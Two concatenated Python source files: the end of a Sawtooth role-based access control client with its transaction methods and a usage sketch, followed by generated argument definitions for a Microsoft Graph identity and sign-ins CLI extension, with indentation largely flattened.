user_name=user_name,
user_id=user_id,
metadata=uuid4().hex,
manager_id=manager_id)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_role(self, key, role_name, role_id, metadata, admins, owners):
batch_list, signature = role_transaction_creation.create_role(
txn_key=key,
batch_key=BATCHER_KEY,
role_name=role_name,
role_id=role_id,
metadata=metadata,
admins=admins,
owners=owners)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_update_manager(self,
key,
proposal_id,
user_id,
new_manager_id,
reason,
metadata):
batch_list, signature = manager_transaction_creation.propose_manager(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
user_id=user_id,
new_manager_id=new_manager_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_update_manager(self,
key,
proposal_id,
reason,
user_id,
manager_id):
batch_list, signature = manager_transaction_creation.confirm_manager(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_update_manager(self,
key,
proposal_id,
reason,
user_id,
manager_id):
batch_list, signature = manager_transaction_creation.reject_manager(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_admins(self,
key,
proposal_id,
role_id,
user_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_admins(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_admins(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_owners(self,
key,
proposal_id,
role_id,
user_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_owners(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_owners(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_members(self,
key,
proposal_id,
role_id,
user_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_members(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_members(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_members(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_members(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_members(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_tasks(self,
key,
proposal_id,
role_id,
task_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_tasks(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_tasks(self,
key,
proposal_id,
role_id,
task_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_tasks(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_tasks(self,
key,
proposal_id,
role_id,
task_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_tasks(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_task(self,
key,
task_id,
task_name,
admins,
owners,
metadata):
batch_list, signature = task_transaction_creation.create_task(
txn_key=key,
batch_key=BATCHER_KEY,
task_id=task_id,
task_name=task_name,
admins=admins,
owners=owners,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_add_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.confirm_add_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.reject_add_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_add_task_owner(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.confirm_add_task_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.reject_add_task_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_remove_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_remove_task_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def make_key_and_name():
context = sawtooth_signing.create_context('secp256k1')
private_key = context.new_random_private_key()
pubkey = context.get_public_key(private_key)
key = Key(public_key=pubkey.as_hex(), private_key=private_key.as_hex())
return key, uuid4().hex
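# A minimal usage sketch for the client above, assuming a Sawtooth REST API is
# reachable at the hypothetical URL below; it reuses only names defined in this
# module (make_key_and_name, RBACClient).
if __name__ == '__main__':
    signer_key, display_name = make_key_and_name()
    rbac = RBACClient('http://rest-api:8008')  # assumed endpoint
    # create_user signs and submits a batch, then polls for its status; each
    # status entry resolves to COMMITTED on success or INVALID when a
    # validation rule fails.
    result = rbac.create_user(key=signer_key,
                              name=display_name,
                              user_name=display_name,
                              user_id=signer_key.public_key)
    print(result[0]['status'])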
# Next file: msgraph-cli-extensions/beta/identitysignins_beta/azext_identitysignins_beta/generated/_params.py
# Repo: thewahome/msgraph-cli @ 33127d9efa23a0e5f5303c93242fbdbb73348671 (MIT)
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from msgraph.cli.core.commands.parameters import (
get_three_state_flag,
get_enum_type
)
from msgraph.cli.core.commands.validators import validate_file_or_dict
from azext_identitysignins_beta.action import (
AddNamedLocations,
AddGrantControls,
AddApplicationEnforcedRestrictions,
AddCloudAppSecurity,
AddPersistentBrowser,
AddSignInFrequency,
AddApplications,
AddClientApplications,
AddDevices,
AddDeviceStates,
AddLocations,
AddPlatforms,
AddUsers,
AddDataLossPreventionPolicies,
AddSensitivityPolicySettings,
AddAssignedPolicies,
AddAutoLabeling,
AddLabelActions,
AddResults,
AddApplication,
AddClassifyText,
AddNotificationInfo,
AddCurrentLabel,
AddDowngradeJustification,
AddExtendedProperties,
AddMetadata,
AddClassificationResults,
AddB2CAuthenticationMethodsPolicy,
AddActivityBasedTimeoutPolicies,
AddClaimsMappingPolicies,
AddHomeRealmDiscoveryPolicies,
AddPrivateLinkResourcePolicies,
AddTokenIssuancePolicies,
AddTokenLifetimePolicies,
AddIdentitySecurityDefaultsEnforcementPolicy,
AddApplyActions,
AddReviewers,
AddAppliesTo,
AddDefaultUserRolePermissions,
AddExcludes,
AddIncludes,
AddGeoCoordinates,
AddActivity,
AddPolicies,
AddKeys,
AddEmailMethods,
AddFido2Methods,
AddMethods,
AddMicrosoftAuthenticatorMethods,
AddOathMethods,
AddOperations,
AddPasswordlessMicrosoftAuthenticatorMethods,
AddPasswordMethods,
AddPhoneMethods,
AddSecurityQuestionMethods,
AddTemporaryAccessPassMethods
)
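# The Add* names imported above are argparse action classes generated
# alongside this module in azext_identitysignins_beta.action; following the
# usual pattern for generated Azure CLI extensions, each one parses
# space-separated KEY=VALUE tokens from the command line into the nested
# object the Microsoft Graph API expects for that complex parameter.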
def load_arguments(self, _):
with self.argument_context('identitysignins data-policy-operation-data-policy-operation create-data-policy-operation') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('completed_date_time', help='Represents when the request for this data policy operation was '
'completed, in UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Null until the operation completes.')
c.argument('progress', type=float, help='Specifies the progress of an operation.')
c.argument('status', arg_type=get_enum_type(['notStarted', 'running', 'complete', 'failed',
'unknownFutureValue']), help='')
c.argument('storage_location', type=str, help='The URL location to where data is being exported for export '
'requests.')
c.argument('submitted_date_time', help='Represents when the request for this data operation was submitted, in '
'UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('user_id', type=str, help='The id for the user on whom the operation is performed.')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation delete-data-policy-operation') as c:
c.argument('data_policy_operation_id', type=str, help='key: id of dataPolicyOperation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation list-data-policy-operation') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation show-data-policy-operation') as c:
c.argument('data_policy_operation_id', type=str, help='key: id of dataPolicyOperation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation update-data-policy-operation') as c:
c.argument('data_policy_operation_id', type=str, help='key: id of dataPolicyOperation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('completed_date_time', help='Represents when the request for this data policy operation was '
'completed, in UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Null until the operation completes.')
c.argument('progress', type=float, help='Specifies the progress of an operation.')
c.argument('status', arg_type=get_enum_type(['notStarted', 'running', 'complete', 'failed',
'unknownFutureValue']), help='')
c.argument('storage_location', type=str, help='The URL location to where data is being exported for export '
'requests.')
c.argument('submitted_date_time', help='Represents when the request for this data operation was submitted, in '
'UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('user_id', type=str, help='The id for the user on whom the operation is performed.')
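# Illustrative invocation (hypothetical values; '<cli>' stands for whatever
# entry point the msgraph-cli install provides):
#   <cli> identitysignins data-policy-operation-data-policy-operation \
#       create-data-policy-operation --status running --progress 0 \
#       --user-id 00000000-0000-0000-0000-000000000000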
with self.argument_context('identitysignins identity create-user-flow') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('user_flow_type', arg_type=get_enum_type(['signUp', 'signIn', 'signUpOrSignIn', 'passwordReset',
'profileUpdate', 'resourceOwner', 'unknownFutureValue']),
help='')
c.argument('user_flow_type_version', type=float, help='')
with self.argument_context('identitysignins identity delete-conditional-access') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity delete-user-flow') as c:
c.argument('identity_user_flow_id', type=str, help='key: id of identityUserFlow')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity list-user-flow') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity show-conditional-access') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity show-user-flow') as c:
c.argument('identity_user_flow_id', type=str, help='key: id of identityUserFlow')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity update-conditional-access') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('named_locations', action=AddNamedLocations, nargs='+', help='')
c.argument('policies', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins identity update-user-flow') as c:
c.argument('identity_user_flow_id', type=str, help='key: id of identityUserFlow')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('user_flow_type', arg_type=get_enum_type(['signUp', 'signIn', 'signUpOrSignIn', 'passwordReset',
'profileUpdate', 'resourceOwner', 'unknownFutureValue']),
help='')
c.argument('user_flow_type_version', type=float, help='')
with self.argument_context('identitysignins identity-conditional-access create-named-location') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents creation date and time of the location '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('display_name', type=str, help='Human-readable name of the location.')
c.argument('modified_date_time', help='The Timestamp type represents last modified date and time of the '
'location using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 '
'would look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
with self.argument_context('identitysignins identity-conditional-access create-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
with self.argument_context('identitysignins identity-conditional-access delete-named-location') as c:
c.argument('named_location_id', type=str, help='key: id of namedLocation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity-conditional-access delete-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity-conditional-access list-named-location') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access list-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access show-named-location') as c:
c.argument('named_location_id', type=str, help='key: id of namedLocation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access show-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access update-named-location') as c:
c.argument('named_location_id', type=str, help='key: id of namedLocation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents creation date and time of the location '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('display_name', type=str, help='Human-readable name of the location.')
c.argument('modified_date_time', help='The Timestamp type represents last modified date and time of the '
'location using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 '
'would look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
with self.argument_context('identitysignins identity-conditional-access update-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
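# Illustrative use of an action-backed complex parameter (hypothetical values;
# the KEY names accepted by --grant-controls are defined by the generated
# AddGrantControls action):
#   <cli> identitysignins identity-conditional-access create-policy \
#       --display-name 'Require MFA' --state enabled \
#       --grant-controls operator=OR built-in-controls=mfa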
with self.argument_context('identitysignins identity-provider-identity-provider create-identity-provider') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='')
c.argument('client_secret', type=str, help='')
c.argument('name', type=str, help='')
c.argument('type_', options_list=['--type'], type=str, help='')
with self.argument_context('identitysignins identity-provider-identity-provider delete-identity-provider') as c:
c.argument('identity_provider_id', type=str, help='key: id of identityProvider')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity-provider-identity-provider list-identity-provider') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-provider-identity-provider show-identity-provider') as c:
c.argument('identity_provider_id', type=str, help='key: id of identityProvider')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-provider-identity-provider update-identity-provider') as c:
c.argument('identity_provider_id', type=str, help='key: id of identityProvider')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='')
c.argument('client_secret', type=str, help='')
c.argument('name', type=str, help='')
c.argument('type_', options_list=['--type'], type=str, help='')
with self.argument_context('identitysignins information-protection-information-protection show-information-protection') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-information-protection update-information-protection') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('data_loss_prevention_policies', action=AddDataLossPreventionPolicies, nargs='+', help='')
c.argument('sensitivity_labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
c.argument('sensitivity_policy_settings', action=AddSensitivityPolicySettings, nargs='+',
help='sensitivityPolicySettings')
c.argument('threat_assessment_requests', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Policy')
c.argument('labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.',
arg_group='Policy')
with self.argument_context('identitysignins information-protection create-data-loss-prevention-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('name', type=str, help='')
with self.argument_context('identitysignins information-protection create-sensitivity-label') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection create-threat-assessment-request') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('category', arg_type=get_enum_type(['undefined', 'spam', 'phishing', 'malware',
'unknownFutureValue']), help='')
c.argument('content_type', arg_type=get_enum_type(['mail', 'url', 'file']), help='')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('expected_assessment', arg_type=get_enum_type(['block', 'unblock']), help='')
c.argument('request_source', arg_type=get_enum_type(['undefined', 'user', 'administrator']), help='')
c.argument('status', arg_type=get_enum_type(['pending', 'completed']), help='')
c.argument('results', action=AddResults, nargs='+', help='A collection of threat assessment results. '
'Read-only. By default, a GET /threatAssessmentRequests/{id} does not return this property unless '
'you apply $expand on it.')
c.argument('application', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('device', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('user', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
with self.argument_context('identitysignins information-protection delete-data-loss-prevention-policy') as c:
c.argument('data_loss_prevention_policy_id', type=str, help='key: id of dataLossPreventionPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-sensitivity-label') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-sensitivity-policy-setting') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-threat-assessment-request') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection evaluate-label-and-policy') as c:
c.argument('classify_text', action=AddClassifyText, nargs='+', help='textClassificationRequest')
c.argument('evaluation_input', type=validate_file_or_dict, help='dlpEvaluationInput Expected value: '
'json-string/@json-file.', arg_group='Evaluate Data Loss Prevention Policies')
c.argument('notification_info', action=AddNotificationInfo, nargs='+', help='dlpNotification',
arg_group='Evaluate Data Loss Prevention Policies')
c.argument('target', type=str, help='', arg_group='Evaluate Data Loss Prevention Policies')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel', arg_group='Evaluate '
'Sensitivity Labels')
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.', arg_group='Evaluate Sensitivity Labels')
with self.argument_context('identitysignins information-protection list-data-loss-prevention-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection list-sensitivity-label') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
